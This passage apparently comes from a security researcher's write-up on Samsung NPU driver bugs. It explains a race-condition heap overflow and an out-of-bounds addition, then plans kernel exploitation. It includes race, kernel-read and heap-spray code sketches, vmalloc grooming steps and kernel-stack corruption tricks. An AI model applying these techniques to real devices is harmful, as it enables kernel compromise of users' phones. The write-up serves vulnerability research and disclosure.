    ncp = (struct ncp_header *)ncp_vaddr;
    address_vector_offset = ncp->address_vector_offset;
    address_vector_cnt = ncp->address_vector_cnt;
...
    memory_vector_offset = ncp->memory_vector_offset;
    memory_vector_cnt = ncp->memory_vector_cnt;
    mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);
    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);
...
    for (i = 0; i < memory_vector_cnt; i++) {
        u32 memory_type = (mv + i)->type;
        u32 address_vector_index;
        u32 weight_offset;
        switch (memory_type) {
        case MEMORY_TYPE_IN_FMAP:
          {
            address_vector_index = (mv + i)->address_vector_index;
            if (!EVER_FIND_FM(IFM_cnt, *temp_IFM_av, address_vector_index)) {
                (*temp_IFM_av + (*IFM_cnt))->index = address_vector_index;
                (*temp_IFM_av + (*IFM_cnt))->size = (av + address_vector_index)->size;
                (*temp_IFM_av + (*IFM_cnt))->pixel_format = (mv + i)->pixel_format;
                (*temp_IFM_av + (*IFM_cnt))->width = (mv + i)->width;
                (*temp_IFM_av + (*IFM_cnt))->height = (mv + i)->height;
                (*temp_IFM_av + (*IFM_cnt))->channels = (mv + i)->channels;
                (mv + i)->stride = 0;
                (*temp_IFM_av + (*IFM_cnt))->stride = (mv + i)->stride;
...
                (*IFM_cnt)++;
            }
            break;
          }
...
        case MEMORY_TYPE_WEIGHT:
          {
            // update address vector, m_addr with ncp_alloc_daddr + offset
            address_vector_index = (mv + i)->address_vector_index;
            weight_offset = (av + address_vector_index)->m_addr;
            if (weight_offset > (u32)session->ncp_mem_buf->size) {
                ret = -EINVAL;
                npu_uerr("weight_offset is invalid, offset(0x%x), ncp_daddr(0x%x)\n",
                    session, (u32)weight_offset, (u32)session->ncp_mem_buf->size);
                goto p_err;
            }
            (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;
...
            (*WGT_cnt)++;
            break;
          }
...
        }
    }
...
}

Once again, there are several things to note here.

First off, it does indeed turn out that memory_vector_cnt is read a second time from the shared ION buffer, and there are no sanity checks to ensure that the arrays temp_IFM_av, temp_OFM_av, and temp_IMB_av are not filled beyond the counts for which they were each allocated. So this is indeed a linear heap overflow bug.

But secondly, when processing a memory_vector element of type MEMORY_TYPE_WEIGHT, it appears that there's another issue as well: A controlled 32-bit value address_vector_index is read from the memory_vector entry and used as an index into an address_vector array without any bounds checks. And not only is the out-of-bounds address_vector's m_addr field read, it's also written a few lines later after adding in the ION buffer's device address! So this is an out-of-bounds addition at a controlled offset.

These are the two most serious issues described in Ben's report to Samsung. We'll look at each in more detail in the following two sections in order to understand their constraints.

The heap overflow

How might the heap overflow be triggered?

First, __config_session_info() will call __pilot_parsing_ncp() to count the number of elements of each type in the memory_vector array in the shared ION buffer. Imagine that initially the value of ncp->memory_vector_cnt is 1, and the single memory_vector has type MEMORY_TYPE_IN_FMAP. Then __pilot_parsing_ncp() will return with IFM_cnt set to 1.

Next, __config_session_info() will allocate the temp_IFM_av with space for a single temp_av element.

Concurrently, a thread in userspace will race to change the value of ncp->memory_vector_cnt in the shared ION buffer from 1 to 100. The memory_vector now appears to have 100 elements, and userspace will ensure that the extra elements all have type MEMORY_TYPE_IN_FMAP as well.

Back in the kernel: After allocating the arrays, __config_session_info() will call __second_parsing_ncp() to perform the second stage of parsing. __second_parsing_ncp() will read memory_vector_cnt again, this time getting the value 100. Thus, in the for loop, it will try to process 100 elements from the memory_vector array, and each will be of type MEMORY_TYPE_IN_FMAP. Each iteration will populate another temp_av element in the temp_IFM_av array, and elements after the first will be written off the end of the array.

Furthermore, the out-of-bounds temp_av element's fields are written with contents read from the ION buffer, which means that the contents of the out-of-bounds write can be fully controlled (except for padding between fields).

This seems like an excellent primitive: we're performing an out-of-bounds write off the end of a kernel allocation of controlled size, and we can control both the size of the overflow and the contents of the data we write. This level of control means that it should theoretically be possible to place the temp_IFM_av allocation next to many different types of objects and control the amount of the victim object we overflow. Having such flexibility means that we can choose from a very wide selection of victim objects when deciding the easiest and most reliable exploit strategy.

The one thing to be aware of is that a simple implementation would probably win the race to increase memory_vector_cnt about 25% of the time. The reason for this is that it's probably tricky to get the timing of when to flip from 1 to 100 exactly right, so the simplest strategy is simply to have a user thread alternate between the two values continuously. If each of the reads in __pilot_parsing_ncp() and __second_parsing_ncp() reads either 1 or 100 randomly, then there's a 1 in 4 chance that the first read is 1 and the second is 100. The good thing is that nothing too bad happens if we lose the race: there's possibly a memory leak, but the kernel doesn't crash. Thus, we can just try this over and over until we win.
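
As an illustration, the flipper thread can be as simple as the following sketch (hypothetical names: mv_cnt points at memory_vector_cnt in our userspace mapping of the shared ION buffer, and race_done is set once the overflow has been confirmed):

#include <stdatomic.h>
#include <stdint.h>

static volatile uint32_t* mv_cnt;   // -> memory_vector_cnt in the shared ION mapping
static atomic_bool race_done;

// Launched with: pthread_create(&t, NULL, flip_count, NULL);
static void* flip_count(void* arg) {
  while (!atomic_load(&race_done)) {
    *mv_cnt = 1;    // the value __pilot_parsing_ncp() should see
    *mv_cnt = 100;  // the value __second_parsing_ncp() should see
  }
  return NULL;
}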

The out-of-bounds addition

Now that we've seen the heap overflow, let's look at the out-of-bounds addition primitive. Unlike the prior primitive, this one is a straightforward, deterministic out-of-bounds addition.

Once again, we'll initialize our ION buffer to have a single memory_vector element, but this time its type will be MEMORY_TYPE_WEIGHT. Nothing interesting happens in __pilot_parsing_ncp(), so we'll jump ahead to __second_parsing_ncp().

In __second_parsing_ncp(), address_vector_offset is read directly from the ION buffer without input validation. This is added to the ION buffer address to compute the address of an array of address_vector structs; since the offset was unchecked, this supposed address_vector array could lie entirely in out-of-bounds memory. And importantly, there are no alignment checks, so the address_vector array could start at any odd unaligned address we want.

    address_vector_offset = ncp->address_vector_offset;
...
    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);

We next enter the for loop to process the single memory_vector entry, and jump to the case for MEMORY_TYPE_WEIGHT. This code reads the address_vector_index field of the memory_vector, which is again completely controlled and unvalidated. The (potentially out-of-bounds) address_vector element at the specified index is then accessed.

    // update address vector, m_addr with ncp_alloc_daddr + offset
    address_vector_index = (mv + i)->address_vector_index;
    weight_offset = (av + address_vector_index)->m_addr;

Reading the m_addr field (at offset 0x4 in address_vector) will thus possibly perform an out-of-bounds read.

But there's a check we need to pass before we can hit the out-of-bounds write:

    if (weight_offset > (u32)session->ncp_mem_buf->size) {
        ret = -EINVAL;
        npu_uerr("weight_offset is invalid, offset(0x%x), ncp_daddr(0x%x)\n",
            session, (u32)weight_offset, (u32)session->ncp_mem_buf->size);
        goto p_err;
    }

Basically, what this does is compare the original value of the out-of-bounds read to the size of the ION buffer, and if the original value is greater than the ION buffer size, then __second_parsing_ncp() aborts without performing the write.

But, assuming that the original value is less than the ION buffer size, it gets updated by adding in the device address (daddr) of the ION buffer:

    (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;

The device address is (presumably) the address at which a device could access the buffer; this could be a physical address, or if the system has an IOMMU in front of the hardware device performing the access, it would be an IOMMU-translated address. Essentially, this code expects that the m_addr field in the address_vector will initially be an offset from the start of the ION buffer, and it updates it into an absolute (device) address by adding the ION buffer's daddr.

So, if the original value at the out-of-bounds addition location is quite small, and in particular smaller than the ION buffer size, then this primitive will allow us to add in the ION buffer's daddr, making the value rather large instead.

"Hey Siri, how do I exploit Android?"

Everything described up to here comes more or less directly from Ben's initial report to Samsung. So: what now?

Even after reading Ben's initial report and looking at the NPU driver's source code to understand the bugs more fully, I felt rather lost as to how to proceed. As the title and intro to this post suggest, Android is not my area.

On the other hand, I have written a few iOS kernel exploits for memory corruption bugs before. Based on that experience, I suspected that both the heap overflow and the out-of-bounds addition could be exploited using straightforward applications of existing techniques, had the bugs existed on iOS. So I embarked on a thought experiment: what would the full exploit flows for each of these primitives be if the bugs existed on iOS instead of Android? My hope was that I might be able to draw parallels between the two, such that thinking about the exploit on iOS would inform how these bugs could be exploited on Android.

Thought experiment: an iOS heap overflow

So, imagine that an equivalent to the heap overflow bug existed on iOS; that is, imagine there were a race with a 25% win rate that allowed us to perform a fully controlled linear heap buffer overflow out of a controlled-size allocation. How could we turn this into arbitrary kernel read/write?

On iOS, the de-facto standard for a final kernel read/write capability has been the use of an object called a kernel task port. A task port is a handle that gives us control over the virtual memory of a task, and a kernel task port is a task port for the kernel itself. Thus, if you can construct a kernel task port, you can use standard APIs like mach_vm_read() and mach_vm_write() to read and write kernel memory from userspace.

Comparing this heap overflow to the vulnerabilities listed in the survey, the initial primitive is most similar to that granted by CVE-2017-2370, which was exploited by extra_recipe and Yalu102. Thus, the exploit flow would likely be quite similar to those existing iOS exploits. And to make our thought experiment even easier, we can put aside any concern about reliability and just imagine the simplest exploit flow that could work generically.

The most straightforward way to get a handle to a kernel task port using this primitive would likely be to overflow into an out-of-line Mach ports array and insert a pointer to a fake kernel task port, such that receiving the overflowed port array back in userspace grants us a handle to our fake port. This is essentially the strategy used by Yalu102, except that that exploit relies on the absence of PAN (i.e., it relies on being able to dereference userspace pointers from kernel mode). The same strategy should work on systems with PAN, it would just require a few extra steps.

Unfortunately, the first time we trigger the vulnerability to give ourselves a handle to a fake task port, we won't have all the information needed to immediately construct a kernel task port: we'd need to leak the addresses of a few important kernel objects, such as the kernel_map, first. Consequently, we would need to start first by giving ourselves a "vanilla" fake task port and then use that to read arbitrary kernel memory via the traditional pid_for_task() technique. Once we can read kernel memory, we would locate the relevant kernel objects to build the final kernel task port.

Now, since we'll need to perform multiple arbitrary reads using pid_for_task(), we need to be able to update the kernel address we want to read from. This can be a challenge because the pointer specifying the target read address lives in kernel memory. Fortunately, there already exist a few standard techniques for updating this pointer to read from new kernel addresses, such as reallocating the buffer holding the target read pointer (see the Chaos exploit), overlapping Mach ports in special ways that allow updating the target read address directly (see the v0rtex exploit), or placing the fake kernel objects in user/kernel shared memory (see the oob_timestamp exploit).
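
For example, with the fake task placed in user/kernel shared memory (as in the oob_timestamp technique), a 4-byte read might look like the following sketch (fake_tfp, fake_task_bsd_info, and the p_pid offset are assumptions that vary by kernel version):

#include <mach/mach.h>
#include <stdint.h>

// Mach trap; declared in <mach/mach_traps.h> on most SDKs.
extern kern_return_t pid_for_task(mach_port_name_t t, int* pid);

#define P_PID_OFFSET 0x68   // offsetof(struct proc, p_pid); version-dependent

// fake_task_bsd_info points into shared memory at the fake task's bsd_info
// field, so updating it re-targets the read without another corruption.
uint32_t kread32(mach_port_t fake_tfp, volatile uint64_t* fake_task_bsd_info,
                 uint64_t kaddr) {
  *fake_task_bsd_info = kaddr - P_PID_OFFSET;  // bsd_info->p_pid aliases *kaddr
  int pid = 0;
  pid_for_task(fake_tfp, &pid);                // returns the 4 bytes at kaddr
  return (uint32_t)pid;
}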

Finally, there will also be some complications from working around Apple's zone_require mitigation, which aims to block exactly these types of fake Mach port shenanigans. However, at least through iOS 13.3, it's possible to get around zone_require by operating with large allocations that live outside the zone_map (see the oob_timestamp exploit).

So, in summary, a very simplistic exploit flow for the heap overflow might look something like this:

  1. Spray large amounts of kernel memory with fake task ports and fake tasks, such that you can be reasonably sure that one fake object of each type has been sprayed to a specific hardcoded address. Use the oob_timestamp trick to bypass zone_require and place these fake objects in shared memory.
  2. Spray out-of-line Mach ports allocations, and poke holes between the allocations.
  3. Trigger the out-of-bounds write out of an allocation of the same size as the out-of-line Mach ports allocations, overflowing into the subsequent array of Mach ports and inserting the hardcoded pointer to the fake ports.
  4. Receive the out-of-line Mach port handles in userspace and check if there's a new task port handle; if not, go back to step 2.
  5. This handle is a fake task port that can be used to read kernel memory using pid_for_task(). Use this capability to find relevant kernel objects and update the fake task into a fake kernel task object.

Thought experiment: an iOS out-of-bounds addition

What about the out-of-bounds addition?

None of the bugs in the survey of iOS kernel exploits seem like a good comparison point: the most similar category would be linear heap buffer overflows, but these are much more limiting due to spatial locality. Nonetheless, I eventually settled on oob_timestamp as the best reference.

The vulnerability used by oob_timestamp is CVE-2020-3837, a linear heap out-of-bounds write of up to 8 bytes of timestamp data. However, this isn't the typical heap buffer overflow. Most heap overflows occur in small to medium-sized allocations of up to 2 pages (0x8000 bytes); these allocations occur in a submap of the kernel virtual address space called the zone_map. Meanwhile, the out-of-bounds write in oob_timestamp occurs off the end of a pageable region of shared memory outside the zone_map, in the general kernel_map used for large, multi-page allocations or allocations with special properties (like pageable and shared memory).

The basic flow of oob_timestamp is as follows:

  1. Groom the kernel_map to allocate the pageable shared memory region, an ipc_kmsg, and an out-of-line Mach ports array contiguously. These are followed by a large number of filler allocations.
  2. Trigger the overflow to overwrite the first few bytes of the ipc_kmsg, increasing the size field.
  3. Free the ipc_kmsg, causing the subsequent out-of-line Mach ports array to also be freed.
  4. Reallocate the out-of-line Mach ports array with controlled data, effectively inserting fake Mach port pointers into the array. The pointer will be a pointer to a fake task port in the pageable shared memory region.
  5. Receive the out-of-line Mach ports in userspace, gaining a handle to the fake port.
  6. Overwrite the fake port in shared memory to make a fake task port and then read kernel memory using pid_for_task(). Find relevant kernel objects and update the fake task into a fake kernel task.

My thought was that you could basically use the out-of-bounds addition primitive as a drop-in replacement for the out-of-bounds timestamp write primitive in oob_timestamp. This seemed sensible because the initial primitive in oob_timestamp is only used to increase the size of an ipc_kmsg so that extra memory gets freed. Since all I need to do is bump an ipc_kmsg's size field, I felt that an out-of-bounds addition primitive should surely be suitable for this.

As it turns out, the constraints of the out-of-bounds addition are actually much tighter than I had imagined: the ipc_kmsg's size and the ION buffer's device address would need to be very carefully chosen to meet all the requirements. In spite of this oversight, oob_timestamp still proved a useful reference point for another reason: where the ION buffers get mapped in kernel memory.

Like iOS, Android also has multiple areas of virtual memory in which allocations can be made. kmalloc() is the standard allocation function used for most allocations. It's somewhat analogous to allocating using kalloc() on iOS: allocations can be less than a page in size and are managed via a dedicated allocation pool that's a bit like the zone_map. However, there's also a vmalloc() function for allocating "virtually contiguous memory". Unlike kmalloc(), vmalloc() allocates at page granularity and allocations occur in a separate region of kernel virtual memory somewhat analogous to the kernel_map on iOS.

The reason this matters is that the ION buffer on Android is mapped into the Linux kernel's vmalloc region. Thus, the fact that the out-of-bounds addition occurs off the end of a shared ION buffer mapped in the vmalloc area closely parallels how the oob_timestamp overflow occurs off the end of a pageable shared memory region in the kernel_map.

Choosing a path

At this point I still faced many unknowns: What allocation and heap shaping primitives were available on Android? What types of objects would be useful to corrupt? What would be Android's equivalent of the kernel task port, the final read/write capability? I had no idea.

One thing I did have was a hint at a good starting point: Both Ben and fellow Project Zero researcher Jann Horn had pointed out that along with the ION buffers, kernel thread stacks were also allocated in the vmalloc area, which meant that kernel stacks might be a good target for the out-of-bounds addition bug.

[Diagram: an ION buffer mapped directly before a userspace thread's kernel stack, with a guard page in between; address_vector_offset is so large that it points past the end of the ION buffer and into the stack.]

If the ION buffer is mapped directly before a kernel stack for a userspace thread, then the out-of-bounds addition primitive could be used to manipulate the stack.

Imagine that we could get a kernel stack for a thread in our process allocated at a fixed offset after the ION buffer. The out-of-bounds addition primitive would let us manipulate values on the thread's stack during a syscall by adding in the ION buffer's daddr, assuming that the initial values were sufficiently small. For example, we might make a blocking syscall which saves a certain size parameter in a variable, and once that syscall blocks and spills the size variable to the stack, we can use the out-of-bounds addition to make it very large; unblocking the syscall would then cause the original code to resume and use the corrupted size value, perhaps passing it to a function like memcpy() to cause further memory corruption.

Using the out-of-bounds addition primitive to target values on a thread's kernel stack was appealing for one very important reason: in theory, this technique could dramatically reduce the amount of Linux-specific knowledge I'd need to develop a full exploit.

Most typical memory corruption exploits require finding specific objects that are interesting targets for corruption. For example, there are very few objects that could replace the ipc_kmsg in the oob_timestamp exploit, because the exploit relies on corrupting a size field stored at the very start of the struct; not many other objects have a size as their first field. So ipc_kmsg fills a very important niche in the arsenal of interesting objects to target with memory corruption, just as Mach ports fill a niche in useful objects to get a fake handle for.

Undoubtedly, there's a similar arsenal of useful objects to target for Android kernel exploitation. But by limiting ourselves to corrupting values on the kernel stack, we transform the set of all useful target "objects" into the set of useful stack frames to manipulate. This is a much easier set of target objects to work with than the set of all structs that could be allocated after the ION buffer because it doesn't require much Linux-specific knowledge to reason about semantics: We only need to identify relevant syscalls and look at the kernel binary in a disassembler to get a handle on what "objects" we have available to us.

Selecting the out-of-bounds addition primitive and choosing to target kernel thread stacks effectively solves the problem of finding useful kernel objects to corrupt: it turns what would be a codebase-wide search into a simple enumeration of interesting stack frames in a disassembler, without needing to learn much in the way of Linux internals.

Nevertheless, we are still left with two pressing questions: What allocation and heap shaping primitives do we have on Android? And what will be our final read/write capability to parallel the kernel task port?

Heap shaping

I started with the heap shaping primitive since it seemed the more tangible problem.

As previously mentioned, the vmalloc area is a region of the kernel's virtual address space in which allocations and mappings of page-level granularity can be made, comparable to the kernel_map on iOS. And just like how iOS provides a means of inspecting virtual memory regions in the kernel_map via vmmap, Linux provides a way of inspecting the allocations in the vmalloc area through /proc/vmallocinfo.

The /proc/vmallocinfo interface provides a simple textual description of each allocated virtual memory region inside the vmalloc area, including the start and end addresses, the size of the region in bytes, and some information about the allocation, such as the allocation site:

0xffffff8013bd0000-0xffffff8013bd5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8013bd8000-0xffffff8013bdd000   20480 unpurged vm_area
0xffffff8013be0000-0xffffff8013be5000   20480 unpurged vm_area
0xffffff8013be8000-0xffffff8013bed000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8013bed000-0xffffff8013cec000 1044480 binder_alloc_mmap_handler+0xa4/0x1e0 vmalloc
0xffffff8013cec000-0xffffff8013eed000 2101248 ion_heap_map_kernel+0x110/0x16c vmap
0xffffff8013eed000-0xffffff8013fee000 1052672 ion_heap_map_kernel+0x110/0x16c vmap
0xffffff8013ff0000-0xffffff8013ff5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8013ff8000-0xffffff8013ffd000   20480 unpurged vm_area
0xffffff8014000000-0xffffff80140ff000 1044480 binder_alloc_mmap_handler+0xa4/0x1e0 vmalloc
0xffffff8014108000-0xffffff801410d000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

This gives us a way to visualize the vmalloc area and ensure that our allocations are grooming the heap as we want them to.

Our heap shaping needs to place a kernel thread stack at a fixed offset after the ION buffer mapping. By inspecting the kernel source code and the vmallocinfo output, I determined that kernel stacks consisted of 4 pages (0x4000 bytes) of data, plus a trailing guard page that is counted in the region's size. Thus, my initial heap shaping idea was:

  1. Allocate a large allocation of, say, 0x80000 bytes.
  2. Spray kernel stacks by creating new threads to fill up all 0x5000-byte holes in the vmalloc area before our large 0x80000-byte allocation (a sketch of this thread spray follows the list).
  3. Free the large allocation. This should make an 0x80000-byte hole with no 0x5000-byte holes before it.
  4. Spray several more kernel stacks by creating new threads; these stacks should fall into the beginning of the hole, and also fill any earlier holes created by exiting threads from other processes.
  5. Map the ION buffer into the kernel by invoking the VS4L_VERTEXIOC_S_GRAPH ioctl, but without triggering the out-of-bounds addition. The ION buffer mapping should also fall into the hole.
  6. Spray more kernel stacks by creating new threads. These should fall into the hole as well, and one of them should land directly after the ION buffer.
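
The kernel stack sprays in steps 2, 4, and 6 just mean creating threads that stay alive; a minimal sketch (each new thread gets a fresh 0x4000-byte kernel stack, plus guard page, from the vmalloc area):

#include <pthread.h>
#include <stddef.h>
#include <unistd.h>

static void* stack_holder(void* arg) {
  pause();   // block forever so the thread's kernel stack stays allocated
  return NULL;
}

static void spray_kernel_stacks(size_t count) {
  for (size_t i = 0; i < count; i++) {
    pthread_t t;
    pthread_create(&t, NULL, stack_holder, NULL);
  }
}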

Unfortunately, when I proposed this strategy to my teammates, Jann Horn pointed out a problem. In XNU, when you free a kernel_map allocation, that virtual memory region becomes immediately available for reuse. However, in Linux, freeing a vmalloc allocation usually just marks the allocation as freed without allowing you to immediately reclaim the virtual memory range; instead, the range becomes an "unpurged vm_area", and these areas are only properly freed and reclaimed once the amount of unpurged vm_area memory crosses a certain threshold. The reason Linux batches reclaiming freed virtual memory regions like this is to minimize the number of expensive global TLB flushes.

Consequently, this approach doesn't work exactly as we'd like: it's hard to know precisely when the unpurged vm_area allocations will be purged, so we can't be sure that we're reclaiming the hole to arrange our allocations. Nevertheless, it is possible to force a vm_area purge if you allocate and free enough memory. We just can't rely on the exact timing.

Even though the straightforward approach wouldn't work, Ben and Jann did help me identify a useful allocation site for spraying controlled-size allocations using vmalloc(). The function binder_alloc_mmap_handler(), which implements mmap() called on /dev/binder file descriptors, contains a call to get_vm_area() on the specific kernel version I was exploiting. Thus, the following sequence of operations would allow me to perform a vmalloc() of any size up to 4 MiB:

int binder_fd = open("/dev/binder", O_RDONLY);
void *binder_map = mmap(NULL, vmalloc_size,
        PROT_READ, MAP_PRIVATE, binder_fd, 0);

The main annoyance with this approach is that only a single allocation can be made using each binder fd; to make multiple allocations, you need to open multiple fds.
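
A sketch of what such a spray might look like, one fd per allocation (illustrative helper, error handling kept minimal):

#include <fcntl.h>
#include <stddef.h>
#include <sys/mman.h>

// Reserve 'count' vmalloc regions of 'size' bytes each via binder mappings;
// returns how many were successfully reserved.
static size_t spray_binder_vmalloc(int* fds, size_t count, size_t size) {
  size_t mapped = 0;
  for (size_t i = 0; i < count; i++) {
    fds[i] = open("/dev/binder", O_RDONLY);
    if (fds[i] < 0)
      break;
    if (mmap(NULL, size, PROT_READ, MAP_PRIVATE, fds[i], 0) == MAP_FAILED)
      break;
    mapped++;
  }
  return mapped;
}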

On my rooted Samsung Galaxy S10 test device, it appeared that the vmalloc area contained a lot of unreserved space at the end, in particular between 0xffffff8050000000 and 0xffffff80f0000000:

0xffffff804a400000-0xffffff804a800000 4194304 vm_map_ram
0xffffff804a800000-0xffffff804ac00000 4194304 vm_map_ram
0xffffff804ac00000-0xffffff804b000000 4194304 vm_map_ram
0xffffff80f9e00000-0xffffff80faa00000 12582912 phys=0x00000009ef800000
0xffffff80fafe0000-0xffffff80fede1000 65015808
0xffffff80fefe0000-0xffffff80ff5e1000 6295552
0xffffff8100d00000-0xffffff8100d3a000  237568 phys=0x0000000095000000
0xffffffbebfdc8000-0xffffffbebfe80000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc
0xffffffbebfe80000-0xffffffbebff38000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc
0xffffffbebff38000-0xffffffbebfff0000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc

Thus, I came up with an alternative strategy to place a kernel thread stack after the ION buffer mapping:

  1. Open a large number of /dev/binder fds.
  2. Spray a large amount of vmalloc memory using the binder fds and then close them, forcing a vm_area purge. We can't be sure of exactly when this purge occurs, so some unpurged vm_area regions will still be left. But forcing a purge will expose any holes at the start of the vmalloc area so that we can fill them in the next step. This prevents these holes from opening up at a later stage, messing up the groom.
  3. Now spray many allocations to the binder fds in decreasing sizes: 4 MiB, 2 MiB, 1 MiB, etc., all the way down to 0x4000 bytes (a code sketch of this spray follows the list). The idea is to efficiently fill holes in the vmalloc heap so that we eventually start allocating from clean virtual address space, like the 0xffffff8050000000 region identified earlier. The first binder vmallocs will fill the large holes, then later allocs will fill smaller and smaller holes, until eventually all 0x5000-byte holes are filled. (It is 0x5000 not 0x4000 because the allocations have a guard page at the end.)
  4. Now create some user threads. Their 0x4000-byte kernel stacks (0x5000-byte reservations including the guard page) will be allocated from the fresh virtual memory area at the end of the vmalloc region.
  5. Now trigger the vulnerable ioctl to map the ION buffer into the vmalloc region. If the ION buffer is chosen to have size 0x4000 bytes, it will also be placed in the fresh virtual memory area at the end of the vmalloc region.
  6. Finally, create some more user threads. Once again, their kernel stacks will be allocated from the fresh VA space, and they will thus be placed directly after the ION buffer, achieving our goal.
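
Step 3's decreasing-size spray, expressed with the spray_binder_vmalloc() sketch from earlier (the per-size count of 64 and the fds array size are illustrative and would be tuned on-device):

static void fill_vmalloc_holes(void) {
  static int fds[1024];
  size_t used = 0;
  // Halve the allocation size each pass, from 4 MiB down to 0x4000 bytes,
  // so progressively smaller vmalloc holes get filled.
  for (size_t sz = 4u << 20; sz >= 0x4000; sz /= 2)
    used += spray_binder_vmalloc(fds + used, 64, sz);
}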

This technique actually seemed to work reasonably well. By dumping /proc/vmallocinfo at each step, it's possible to check that the kernel heap is being laid out as we hope. And indeed, it did appear that we were getting the ION buffer allocated directly before kernel thread stacks:

0xffffff8083ba0000-0xffffff8083ba5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8083ba8000-0xffffff8083bad000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8083bad000-0xffffff8083bb2000   20480 ion_heap_map_kernel+0x110/0x16c vmap
0xffffff8083bb8000-0xffffff8083bbd000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8083bc0000-0xffffff8083bc5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8083bc8000-0xffffff8083bcd000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8083bd0000-0xffffff8083bd5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff80f9e00000-0xffffff80faa00000 12582912 phys=0x00000009ef800000
0xffffff80fafe0000-0xffffff80fede1000 65015808
0xffffff80fefe0000-0xffffff80ff5e1000 6295552

Stack manipulation

At this point we can groom the kernel heap to place the kernel stack for one of our process's threads directly after the ION buffer, giving us the ability to manipulate the thread's stack while it is blocked in a syscall. The next question is: what should we manipulate?

In order to answer this, we really need to understand the constraints of our bug. As discussed above, our primitive is the ability to perform an out-of-bounds addition on a 32-bit unsigned value, adding in the ION buffer's device address (daddr), so long as the original value being modified is less than the ION buffer's size.

The code in npu-session.c performs a copious amount of logging, so it's possible to check the address of the ION allocation from a root shell using the following command:

cat /proc/kmsg | grep ncp_ion_map

In my early tests, the ION buffer's daddr was usually between 0x80500000 and 0x80700000, and always matched the mask 0x80xx0000. If we use a size of 0x4000 for our ION buffer, then that means our primitive will transform a small positive value on the stack into a very large positive (unsigned) or negative (signed) value; for example, we might transform 0x1000 into 0x80611000.

How would we use this to gain code execution? Jann suggested a very interesting trick that could block calls to the functions copy_from_user() and copy_to_user() for arbitrary amounts of time, which could greatly expand the set of block points available during system calls.

copy_from_user() and copy_to_user() are the Linux equivalents of XNU's copyin() and copyout(): They are used to copy memory from userspace into the kernel (copy_from_user()) or to copy memory from the kernel into userspace (copy_to_user()). It's well known that these operations can be blocked by using tricks involving userfaultfd, but this won't be available to us in an exploit from app context. Nevertheless, Jann had discovered that similar tricks could be done using proxy file descriptors (an abstraction over FUSE provided by system_server and vold), essentially allowing page faults on userspace pages to be blocked for arbitrary amounts of time.

One particularly interesting target while blocking a copy_from_user() operation would be copy_from_user() itself. When copy_from_user() performs the actual copy operation in __arch_copy_from_user(), the first access to the magical blocking memory region will trigger a page fault, causing an exception to be delivered and spilling all the registers of __arch_copy_from_user() to the kernel stack while the fault is being processed. During that time, we could come in on another thread using our out-of-bounds addition to increase the size argument to __arch_copy_from_user() where it is spilled onto the stack. That way, once we service the page fault via the proxy file descriptor and allow the exception to return, the modified size value will be popped back into the register and __arch_copy_from_user() will copy more data than expected into kernel memory. If the buffer being copied into lives on the stack, this gives us a deterministic controlled stack buffer overflow that we can use to clobber a return address and get code execution. And the same idea can be applied to copy_to_user() to copy extra memory out of the kernel instead, disclosing kernel stack contents and allowing us to break KASLR and leak the stack cookie.

In order to figure out which spilled register we'd need to target, I looked at __arch_copy_to_user() in IDA. Unfortunately, there's one other complication to make this technique work: due to unrolling, __arch_copy_to_user() will only enter a loop if the size is at least 128 bytes on entry. This means that we'll need to target a syscall that calls copy_to_user() with a size of at least 128 bytes.

Fortunately, it didn't take long to find several good stack disclosure candidates, such as the newuname() syscall:

SYSCALL_DEFINE1(newuname, struct new_utsname __user *, name)
{
    struct new_utsname tmp;
    down_read(&uts_sem);
    memcpy(&tmp, utsname(), sizeof(tmp));
    up_read(&uts_sem);
    if (copy_to_user(name, &tmp, sizeof(tmp)))
        return -EFAULT;
...
}

The new_utsname struct that gets copied out is 0x186 bytes, which means we should enter the looping path in __arch_copy_to_user(). When that access faults, the register containing the copy size 0x186 will be spilled to the stack, and we can change it to a very large value like 0x80610186 before unblocking the fault. To prevent the copyout from running off the end of the kernel stack, we will have the next page in userspace after the magic blocking page be unmapped, causing __arch_copy_to_user() to terminate early and cleanly.

The write path

The above trick should work for reading past the end of a stack buffer; what about for writing?

Here again I ran into a new complication, and this one was significant: copy_from_user() will zero out any unused space in the buffer that was not successfully copied from userspace:

_copy_from_user(void *to, const void __user *from, unsigned long n)
{
    unsigned long res = n;
    might_fault();
    if (likely(access_ok(VERIFY_READ, from, n))) {
        kasan_check_write(to, n);
        res = raw_copy_from_user(to, from, n);
    }
    if (unlikely(res))
        memset(to + (n - res), 0, res);
    return res;
}

This means that copy_from_user() won't let us truncate the write early as we did with copy_to_user() by having an unmapped page after the blocking region. Instead, it will try to memset the memory past the end of the buffer to zero, all the way up to the modified size of at least 0x80500000. copy_from_user() is out.

Thankfully, there are some calls to the alternative function __copy_from_user(), which does not perform this unwanted memset. But these are much rarer, and thus we'll have a very limited selection of syscalls to target.

In fact, pretty much the only call to __copy_from_user() with a large size that I could find was in restore_fpsimd_context(), reached via the sys_rt_sigreturn() syscall. This syscall seems to be related to signal handling, and in particular restoring user context after returning from a signal handler. This particular __copy_from_user() call is responsible for copying in the floating-point register state (registers Q0 - Q31) after validating the signal frame on the user's stack.

The size parameter at this callsite is 512 (0x200) bytes, which is large enough to enter the looping path in __arch_copy_from_user(). However, the address of the floating point register state that is read from during the copy-in is part of the userspace thread's signal frame on the stack, so it would be very tricky to ensure that both

  1. the first access to the blocking page (which must be part of the thread's stack) is in the target call to __copy_from_user() rather than earlier in the signal frame parsing, and
  2. the address passed to __copy_from_user() is deep enough into the blocking page that we hit a subsequent unmapped page in userspace before overflowing off the end of the kernel stack.

